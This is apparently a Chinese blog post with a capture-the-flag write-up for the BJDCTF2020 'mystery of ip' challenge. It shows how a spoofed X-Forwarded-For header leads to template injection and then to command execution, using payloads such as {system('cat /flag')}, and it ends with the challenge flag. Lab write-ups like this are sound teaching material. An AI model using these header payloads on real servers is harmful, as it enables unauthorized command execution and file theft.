[BJDCTF2020]The mystery of ip 1

[BJDCTF2020]The mystery of ip 1

打开实例,发现flag.php路径,访问显示自己当前的内网ip

image-20241124091805543

hackerbar添加xff请求头,尝试ip伪造,成功回显

image-20241124091858569

判断可能为xff注入,尝试sql的部分注入语句均无效,放弃sql注入,尝试SSTI模板注入

X-Forwarded-For: {1+1}

image-20241124092302520

成功回显,存在XFF-SSTI模板注入漏洞

尝试构造payload

X-Forwarded-For: {system("ls")}

image-20241124092406046

成功遍历目录

查看flag.php,未发现flag

image-20241124092536880

查看根目录

X-Forwarded-For: {system("ls / -a")}

image-20241124092622528

发现flag,最终payload为:

X-Forwarded-For: {system("cat /flag")}

image-20241124092700153

flag{b0a840de-eeaf-4ed1-80c1-bb12ff2bcb10} 
posted @   TazmiDev  阅读(39)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· C# 集成 DeepSeek 模型实现 AI 私有化(本地部署与 API 调用教程)
· DeepSeek R1 简明指南:架构、训练、本地部署及硬件要求
· 没有源码,如何修改代码逻辑?
· NetPad:一个.NET开源、跨平台的C#编辑器
点击右上角即可分享
微信分享提示